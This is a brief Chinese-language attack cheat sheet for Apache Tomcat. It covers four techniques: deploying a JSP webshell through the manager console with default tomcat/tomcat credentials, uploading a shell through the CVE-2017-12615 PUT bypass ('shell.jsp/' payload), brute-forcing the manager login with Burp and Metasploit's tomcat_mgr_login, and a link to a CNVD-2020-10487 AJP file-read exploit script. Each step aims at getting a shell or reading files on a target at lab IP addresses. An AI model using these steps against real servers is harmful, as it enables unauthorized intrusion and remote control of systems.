一、后台war包getshell

　　漏洞利用：

　　tomcat在conf/tomcat-users.xml配置用户权限

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

    <role rolename="manager-gui"/>
    <role rolename="manager-script"/>
    <role rolename="manager-jmx"/>
    <role rolename="manager-status"/>
    <role rolename="admin-gui"/>
    <role rolename="admin-script"/>
    <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
    
</tomcat-users>

　　1、构建war包　　

　　jar cvf shell.war test.jsp

　　2、后台页面上传tomcat自动解压war包

　　http://172.16.20.134:8080/manager/html

　　3、cknife连接getshell

　　http://172.16.20.134:8080/shell/test.jsp

二、tomcat任意上传漏洞CVE-2017–12615

　　漏洞利用：　

　　 conf/web.xml处理.jsp 和 .jspx 的时候，是通过JspServlet处理请求的，当.jsp后面有空格的时候交给defaultServlet处理

　　影响windows linux

　　1、访问域名抓包

　　payload:

　　shell.jsp/

　　put上传shell.jsp/ 绕过windows，linux。

　　2、访问域名http://172.16.20.134:8080/test.jsp getshell

三、后台爆破

　　1、后台base64编码传输

　　抓包 

　　字段解密为：

　　payload选择custom itrerator

　　选择base64编码

　　点这爆破

　　msf爆破search tomcat_mgr_login

 四.CNVD-2020-10487-Tomcat-Ajp-lfi

Tomcat-Ajp协议文件读取漏洞

工具地址：https://github.com/AdministratorGithub/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py